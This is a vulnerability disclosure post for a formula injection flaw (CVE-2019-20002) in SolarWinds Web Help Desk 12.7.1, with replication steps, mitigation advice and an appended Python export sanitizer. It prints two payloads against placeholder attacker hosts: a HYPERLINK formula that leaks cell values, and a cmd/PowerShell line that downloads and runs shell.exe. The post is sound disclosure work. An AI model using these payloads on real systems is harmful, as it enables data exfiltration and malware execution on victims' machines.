Formula Injection Vulnerability on SolarWinds WebHelpDesk 12.7.1

AYAAN LATIF SAIKIA
Apr 24, 2020

What is the vulnerability?

Formula injection occurs when untrusted input is embedded in TSV/CSV files and the spreadsheet application that opens them interprets that input as formulas to be computed.

This issue has been assigned CVE-2019-20002.

What is the security impact?

An attacker can use this vulnerability to place malicious payloads in the vulnerable field. When a user exports the data in CSV format and opens it, the user can be tricked into visiting malicious hyperlinks, executing commands, and so on.

For example:

Payload 1: =HYPERLINK("https://www.attacker.com?leak="&A2&B2,"Error: Click here for additional information")

This payload plays on the trust relationship that a victim will have with the server and the content provided by it. Once this payload has been placed, the attacker just has to wait for their victim to take the bait. When the victim downloads and opens the file, they will see the attacker's error message and, given that the file came from a trusted source, will likely click on the cell to investigate the error.

Once the victim clicks on the link, their browser will open and submit a request to the attacker's domain along with the exfiltrated values from the specified cells.

Payload 2: =cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0

This payload will cause a malicious file to be downloaded from the attacker's server using PowerShell and executed.

Replication Steps:

1. Create a new ticket as a user.

2. Fill in the ticket details.

3. In one of the text fields (e.g. Subject), enter a malicious payload.

4. Log in as an admin user and view the tickets in the queue.

5. Export tickets in Excel TSV format.

6. Open the downloaded file and click on the cell.

7. You will be taken to the link in the malicious hyperlink.

Proof of Concept:

Fig 1. Create a ticket as a user, and put malicious payload in Subject field

Fig 2. Admin user views tickets in his queue

Fig 3. Admin user downloads ticket details in TSV format

Fig 4. Admin user opens exported TSV file

Fig 5. On clicking the cell, the unsuspecting user will be taken to malicious website.

Recommendations:

Preventing this attack is as simple as blocking a few key characters. All formulas require one of four special characters, and if you prevent these, then you mitigate this vulnerability:

Equals to (=)
Plus (+)
Minus (-)
At (@)

These characters can either be sanitized or the server can check the content of the uploaded file before allowing it to be uploaded, rejecting any file containing the disallowed characters. This can help ensure the attacker’s payload will never get successfully delivered.
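One way to apply the sanitizing option when the export is generated, as an added example (not SolarWinds' code and not part of the original post): each cell that begins with one of the four characters is prefixed with an apostrophe so it no longer starts with a formula trigger. The names `neutralize_cell`, `export_tsv` and the sample tickets are hypothetical, and skipping leading whitespace before the check is an assumption added here.

```python
import csv
import io

# Leading characters that make a spreadsheet treat a cell as a formula
# (the four listed in the recommendations above).
FORMULA_TRIGGERS = ("=", "+", "-", "@")


def neutralize_cell(value):
    """Return value as text that no longer begins with a formula trigger."""
    text = "" if value is None else str(value)
    # Assumption: leading whitespace (space, tab, CR) is skipped when checking,
    # so "\t=..." or " =..." cannot hide the trigger character.
    if text.lstrip().startswith(FORMULA_TRIGGERS):
        # Trade-off: legitimate values such as "-5" also get the prefix.
        return "'" + text
    return text


def export_tsv(rows):
    """Serialize rows (lists of cell values) to TSV with every cell neutralized."""
    buf = io.StringIO()
    # csv.writer quotes fields containing tabs, quotes or newlines, so user
    # input cannot break out of its column either.
    writer = csv.writer(buf, delimiter="\t", lineterminator="\n")
    for row in rows:
        writer.writerow([neutralize_cell(cell) for cell in row])
    return buf.getvalue()


# Constructed sample tickets; ticket 102 carries a formula-style subject.
SAMPLE_TICKETS = [
    ["Ticket", "Subject", "Client"],
    [101, "Printer offline", "alice"],
    [102, '=HYPERLINK("https://example.invalid","Error")', "bob"],
    [103, "-5 degrees in server room", "carol"],
]

if __name__ == "__main__":
    print(export_tsv(SAMPLE_TICKETS))
```

Applying the check at export time also covers payloads that were stored in ticket fields before any input filter existed.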

Note: The vulnerability has been fixed in the latest product release, Web Help Desk 12.7.2, which was made publicly available on April 14, 2020.
